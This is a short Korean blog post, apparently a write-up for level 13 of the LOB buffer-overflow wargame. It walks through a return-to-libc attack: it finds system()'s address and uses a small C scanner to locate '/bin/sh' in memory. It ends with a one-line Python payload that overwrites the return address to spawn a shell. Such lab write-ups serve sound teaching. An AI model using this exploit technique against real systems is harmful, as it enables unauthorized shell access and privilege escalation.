ii4gsp

LOB - Level13 [darkknight -> bugbear] 본문

시스템 해킹/LOB

LOB - Level13 [darkknight -> bugbear]

ii4gsp 2020. 1. 21. 22:43

RTL기법을 이용한 문제이다.

system()함수의 주소와 "/bin/sh"의 주소를 구해주자.

 

 

 

 

system()함수의 주소는 0x40058ae0이다.

"bin/sh"의 주소도 구해주자.

 

 

 

 

#include <stdio.h>

int main()
{
    int system = 0x40058ae0;

    while(memcmp((void*)system, "/bin/sh", 8))
        system++;

    printf("%x\n", system);

    return 0;
}

위의 소스코드를 작성해주고 실행해주자.

 

 

 

 

"bin/sh"의 주소는 0x400fbff9이다.

페이로드는 (buffer + sfp) + system()주소 + dummy + "/bin/sh"주소

                                                [44byte]              [4byte]         [4byte]       [4byte]

 

 

 

 

payload

./bugbear $(python -c 'print "\x90" * 44 + "\xe0\x8a\x05\x40" + "\x90" * 4 + "\xf9\xbf\x0f\x40"')

'시스템 해킹 > LOB' 카테고리의 다른 글

LOB - Level15 [giant -> assassin]  (0) 2020.01.25
LOB - Level14 [bugbear -> giant]  (0) 2020.01.23
LOB - Level12 [golem -> darkknight]  (0) 2020.01.21
LOB - Level11 [skeleton -> golem]  (0) 2020.01.19
LOB - Level10 [vampire -> skeleton]  (0) 2020.01.18
Comments